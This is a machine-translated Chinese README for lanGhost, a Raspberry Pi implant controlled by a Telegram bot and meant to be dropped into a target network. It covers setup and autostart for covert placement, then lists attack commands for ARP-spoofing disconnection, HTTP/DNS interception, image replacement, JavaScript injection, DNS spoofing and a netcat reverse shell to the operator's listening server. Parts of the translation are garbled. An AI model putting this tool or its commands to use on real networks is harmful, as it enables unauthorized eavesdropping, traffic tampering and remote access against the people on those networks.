Langhost
1.0.0
Langhost是为Raspberry PI ( RPBIAN / KALI的RPI )设计的。在其他/桌面发行版上运行它可能会引起问题,并且可能无法通过除外。
您将需要一个带有新鲜Raspbian/kali在SD卡上的Raspberry Pi ,因为您不希望在后台运行其他任何东西。
启动PI,获得SSH销售或连接监视器和键盘,然后输入以下命令:
$ sudo apt update && sudo apt install python3 python3-pip
$ git clone https://github.com/xdavidhu/lanGhost
$ cd lanGhost
$ sudo ./setup.py
在运行设置脚本时,请阅读问题/消息!
[+] Please enter the name of the network interface connected/will
be connected to the target LAN. Default wired interface is 'eth0',
and the default wireless interface is 'wlan0' on most systems, but
you can check it in a different terminal with the 'ifconfig' command.
[+] Please create a Telegram API key by messaging @BotFather on Telegram
with the command '/newbot'.
After this, @BotFather will ask you to choose a name for your bot.
This can be anything you want.
Lastly, @BotFather will ask you for a username for your bot. You have
to choose a unique username here which ends with 'bot'. For
example: xdavidbot. Make note of this username, since later
you will have to search for this to find your bot, which lanGhost
will be running on.
After you send your username of choise to @BotFather, you will recieve
your API key.
[+] Now for lanGhost to only allow access to you, you need to verify yourself.
Send the verification code below TO THE BOT you just created. Just search for your
bot's @username (what you sent to @BotFather) to find it.
[+] Verification code to send: ******
[+] Do you want lanGhost to start on boot? This option is necessary if you are using
this device as a dropbox, because when you are going to drop this device into a
network, you will not have the chanse to start lanGhost remotely! (autostart works
by adding a new cron '@reboot' entry)
不建议在大于 /24的网络上使用langhost,因为扫描将花费太长时间。
Langhost并不安静。任何监视流量的人都可以看到ARP数据包!
如果您在step 4/4 (autostart)中选择了yes ,则PI已完全设置用于丢弃。 Langhost应该启动启动,并在电报上向您发送文字: lanGhost started! ? 。
确保首先在实验室中尝试一下,并测试Langhost是否响应您的消息!
如果您都设置了所有设置,只需通过将以太网电缆插入PI并通过Micro USB连接电源,就可以将其连接到目标网络,您就可以使用了!
(Langhost也可以在WiFi上工作,但是您需要设置wpa_supplicant才能自动连接到网络)
/scan - Scan LAN network
/scanip [TARGET-IP] - Scan a specific IP address.
/kill [TARGET-IP] - Stop the target's network connection.
/mitm [TARGET-IP] - Capture HTTP/DNS traffic from target.
/replaceimg [TARGET-IP] - Replace HTTP images requested by target.
/injectjs [TARGET-IP] [JS-FILE-URL] - Inject JavaScript into HTTP pages requested by target.
/spoofdns [TARGET-IP] [DOMAIN] [FAKE-IP] - Spoof DNS records for target.
/attacks - View currently running attacks.
/stop [ATTACK-ID] - Stop a currently running attack.
/restart - Restart lanGhost.
/reversesh [TARGET-IP] [PORT] - Create a netcat reverse shell to target.
/help - Display the help menu.
/ping - Pong.
您可以使用以下命令之一开始攻击: /kill, /mitm, /replaceimg, /injectjs, /spoofdns
ATER您有一个或多个攻击,您可以使用/attack命令获取包含ATTACK-ID的列表。
停止攻击类型/stop [ATTACK-ID] 。
/reversesh仅建立一个未加密的NetCat TCP连接,并且可以监视所有流量!仅将其用于紧急修复或在必要时设置加密的反向连接。
/reversesh命令是在无法从外部访问的情况下在PI上获得反向外壳。
要使用/reversesh命令,您需要让服务器侦听外壳。
NetCat命令在您的服务器上启动侦听器:
$ nc -l 0.0.0.0 [PORT]
电报命令:
/reversesh [IP-of-your-listening-server] [PORT]
/kill停止目标的互联网连接。/mitm从目标捕获HTTP和DNS流量,并将其发送到短信中。/replaceimg IMG-将目标的HTTP图像替换为您发送到机器人的图片。/injectjs J-将JavaScript注入目标的每个HTTP HTML响应中。您需要在服务器上托管JS文件,并将URL作为参数。/spoofdns欺骗目标的DNS响应。所有攻击都使用ARP欺骗!
/scan - 扫描本地网络并在线返回主机。使用nmap -sn扫描发现主机。/scanip扫描IP地址以获取开放端口和其他信息。使用nmap -sS扫描。每次新设备连接/离开网络时,您都会收到一条消息。
DavidSchütz的版权(C)2018。保留一些权利。
Langhost遵循MIT许可证的条款,遵循许可证文件中所述的所有澄清。您也可以继续向我发送电子邮件至Xdavid {at} ProtonMail {dot} com。
